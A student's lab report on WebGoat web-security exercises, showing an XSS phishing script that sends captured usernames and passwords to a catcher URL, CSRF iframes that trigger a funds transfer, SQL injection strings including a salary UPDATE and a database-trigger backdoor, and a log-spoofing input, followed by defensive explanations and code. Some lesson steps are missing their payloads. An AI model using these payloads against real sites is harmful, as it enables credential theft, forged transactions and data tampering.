20155331 Web Security Foundation practice of cyber confrontation

Source: Internet
Author: User
Tags: sql injection attack, csrf attack

20155331 "Cyber Confrontation" EXP9 Web Security Basics: experiment procedure (WebGoat)

Enter java -jar webgoat-container-7.0.1-war-exec.jar in the terminal to start WebGoat.

Open the browser, enter localhost:8080/webgoat in the address bar to open WebGoat, and log in with the default account and password.

XSS attack: Phishing with XSS (cross-site scripting phishing attack)

Injected script can construct arbitrary HTML content in the page the user is currently viewing, and can even simulate the user's current actions. The experiment here is an attack that steals a username and password.

Inject the following code in the text box:

</form><script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("You've been attacked ... Your Identity information were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR>  <H2>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" name="user"> <br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

The attacker-written form pops up, asking the user to fill in a user name and password.

The attack succeeds: the user name and password are captured.

Reflected XSS (reflected XSS attack)

In the code box, enter:

Stored XSS Attacks (stored XSS attack)

Open Stored XSS Attacks and enter in the message box:

CSRF attack: Cross Site Request Forgery (CSRF)

Look at the src and menu values in the parameters on the right side of the page.

In the message box, enter the code:

After submitting, the message appears as a link:

Click on the link name to view the user's operation information; the attack succeeds.

CSRF Prompt By-Pass

Look at the src and menu values in the parameters on the right side of the page, enter a number in the Title box, and enter the following code in the Message box:

<iframe src="attack?Screen=512&menu=900&transferFunds=1"></iframe>
<iframe src="attack?Screen=512&menu=900&transferFunds=confirm"></iframe>

After submitting, the message appears as a link titled 5331:

Click on the link name to view the user's operation information; the attack succeeds.

SQL injection attack: String SQL Injection

Use SQL injection to view ID card numbers: enter Smith as prompted, and the query returns all records with the last name Smith.

As can be seen, this makes it easy to obtain the ID card number of the user named Smith.

Enter ' or 1 = '1 to construct an always-true condition.

Numeric SQL Injection

This selection field is a drop-down box that cannot be modified directly, so use Burp Suite to intercept the request and modify it there.

Open Burp Suite, select Proxy -> Options -> Add to add a listener port, set the bound port to 5331 and confirm; a new line appears under Options. Tick the newly added line.


In the browser, open the menu, select Preferences -> Advanced, select the Network tab, and under Connection choose Settings.

Set the proxy server and port in the pop-up window.


After setting up the proxy, go back to the lesson page and click Go; then in Burp Suite select Proxy -> Intercept, and you can see the request has been captured:

Right-click and select Send to Repeater, open the Repeater tab, select Params and change the value of station to 101 or 1=1, then click Go to run it. In the response on the right you can see that the SQL statement became SELECT * FROM weather_data WHERE station = 101 or 1=1

Log Spoofing

In the User Name text box, enter %0d%0alogin succeeded!admin to produce a spoofed login entry in the log; the spoof succeeds:


Lab: SQL Injection, Stage 1

Bypass authentication with string SQL injection. Use SQL injection to log in as the boss ('Neville') without using the correct password. Verify that Neville's profile can be viewed and all functions are available.

Select the user Neville (the admin user) and enter the always-true ' or 1=1-- as the password. The password box's maximum text length turns out to be too short to hold the always-true payload, so right-click -> Inspect Element with Firebug and manually change the password field's maximum length to 11 (the length of the always-true string).

Login successful.

Database Backdoors

Execute multiple SQL statements using string SQL injection. The first statement is the system's; the second one is yours. Your account ID is 101. This page lets you see your password, SSN and salary. Try to inject another UPDATE that raises the salary to something higher.

Enter 101 to retrieve the user's information:

Enter the injection statement 101; UPDATE employee SET salary=100000 and observe that the salary has increased.

Use the statement 101; CREATE TRIGGER Mybackdoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid to create a backdoor: the trigger sets the email of every newly inserted employee row to my address:

Basic questions

What is the principle of an SQL injection attack, and how to defend against it?

Attack principle:

SQL injection occurs when a web application does not check the legality of user input, so an attacker can append additional SQL to a predefined query in the web application and trick the database server into executing unauthorized arbitrary queries, thereby obtaining the corresponding data.

Prevention:

1. Strictly separate the permissions of ordinary users from those of the system administrator.

2. Enforce the use of parameterized statements.

3. Strengthen validation of user input.

4. Use the security parameters available from the SQL Server database.

5. If necessary, use a professional vulnerability scanning tool to find the points that may be attacked.
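To make point 2 concrete, here is an added example (not part of the original report or of WebGoat) that reproduces the String and Numeric SQL Injection lessons against a constructed in-memory SQLite copy of the user_data and weather_data tables, and shows the same queries written with parameterized statements. The string payload uses the quoted form ' or '1'='1 because SQLite compares an integer and a string strictly; the numeric payload is the 101 or 1=1 from the Burp Suite step.

```python
import sqlite3

# Constructed stand-ins for WebGoat's user_data and weather_data tables.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user_data (userid INTEGER, last_name TEXT, cc_number TEXT);
        INSERT INTO user_data VALUES (101, 'Smith', '4111-0000-0000-0001');
        INSERT INTO user_data VALUES (102, 'Jones', '4111-0000-0000-0002');
        CREATE TABLE weather_data (station INTEGER, city TEXT);
        INSERT INTO weather_data VALUES (101, 'Columbia');
        INSERT INTO weather_data VALUES (102, 'Seattle');
    """)
    return db

# Vulnerable: user input is concatenated into the SQL text, as in the lesson.
def vulnerable_lookup(db, last_name):
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return db.execute(sql).fetchall()

def vulnerable_weather(db, station):
    sql = "SELECT * FROM weather_data WHERE station = " + station
    return db.execute(sql).fetchall()

# Hardened: parameterized statements; the driver never treats the input as SQL.
def safe_lookup(db, last_name):
    return db.execute("SELECT * FROM user_data WHERE last_name = ?",
                      (last_name,)).fetchall()

def safe_weather(db, station):
    station_id = int(station)   # numeric field: reject anything that is not an integer
    return db.execute("SELECT * FROM weather_data WHERE station = ?",
                      (station_id,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "' or '1'='1"))   # every row leaks
    print(safe_lookup(db, "' or '1'='1"))         # []
    print(vulnerable_weather(db, "101 or 1=1"))   # every station
    try:
        safe_weather(db, "101 or 1=1")
    except ValueError as e:
        print("rejected:", e)
```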

What is the principle of an XSS attack, and how to defend against it?

Attack principle:

Cross-site scripting (XSS) attacks are similar to SQL injection attacks: attack code is injected into a web page or stored in the database, and it is triggered when a user visits or executes the web page.

Defense methods:

For user input, allow only valid values and filter out all others.
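The following added example (not part of the original report) applies this rule to two of the lesson inputs above: the HTML message used in the XSS lessons and the %0d%0a user name from Log Spoofing. It encodes the message on output, allow-lists a title field, and neutralizes CR/LF before a user name reaches a newline-delimited log. The sample inputs are constructed from the payload shapes on this page.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample inputs modelled on the lesson payloads.
PHISH_FRAGMENT = '</form><script>function hack(){alert("stolen")}</script><form name="phish">'
SPOOFED_NAME = unquote("%0d%0alogin succeeded!admin")   # CR LF followed by a forged line

# Stored/reflected XSS defense: encode on output so any markup in the message is
# displayed as text instead of being parsed by the browser.
def render_message(message):
    return "<p class='message'>" + html.escape(message, quote=True) + "</p>"

# Stricter allow-list for a field with a known shape (the "only valid values" rule):
# a title may contain letters, digits, spaces and basic punctuation, up to 64 chars.
TITLE_RE = re.compile(r"[A-Za-z0-9 .,!?_-]{1,64}")

def valid_title(title):
    return TITLE_RE.fullmatch(title) is not None

# Log spoofing defense: a log file is newline-delimited, so CR/LF inside a field
# must not survive; escaping them keeps the forged "login succeeded" text inside
# the single entry it was submitted in.
def log_login_attempt(username):
    clean = username.replace("\r", "\\r").replace("\n", "\\n")
    return "login failed for username: " + clean

if __name__ == "__main__":
    print(render_message(PHISH_FRAGMENT))
    print(valid_title("5331"), valid_title("<iframe src=x>"))
    print(log_login_attempt(SPOOFED_NAME))
```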

What is the principle of a CSRF attack, and how to defend against it?

Attack principle:

By hijacking a session and forging the user's identity, the attacker achieves some illegal purpose, such as a transfer or a payment, using the victim's logged-in browser.

Defense methods:

Use a verification code, and attach random values (tokens) to forms to prevent forged requests; encrypt the user's private data as far as possible and encrypt it in transit.
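An added example (not part of the original report or of WebGoat) of the "random value attached to the form" defense: a per-session CSRF token is rendered into the transfer form and checked server-side, so a request like the lesson's iframe, which the browser sends with the session cookie but without the token, is rejected. The session store, form field names and handler are assumptions constructed for the example.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> per-session CSRF token.
SESSIONS = {}

def new_session():
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid

# The server renders the transfer form with the token in a hidden field; only a
# page served to this session can contain the right value.
def render_transfer_form(sid):
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="POST" action="attack?Screen=512&menu=900">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input type="text" name="transferFunds"><input type="submit"></form>')

# Server-side check: the browser attaches the session cookie automatically, so a
# forged request from another origin (an <iframe> or hidden form) arrives with a
# valid cookie but cannot read the token that was rendered into the victim's page.
def handle_transfer(cookie_sid, form):
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return (401, "no session")
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return (403, "missing or invalid CSRF token")
    return (200, "transferred " + form.get("transferFunds", "0"))

if __name__ == "__main__":
    sid = new_session()
    good = {"csrf_token": SESSIONS[sid]["csrf_token"], "transferFunds": "1"}
    print(handle_transfer(sid, good))                   # (200, 'transferred 1')
    print(handle_transfer(sid, {"transferFunds": "1"})) # forged: cookie only, no token
```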

Experiment summary

I feel that there are quite a lot of dangers in everyday online activity, and attacks can be carried out through various methods, so in website programming the user's input should be judged reasonably in order to ensure user security.
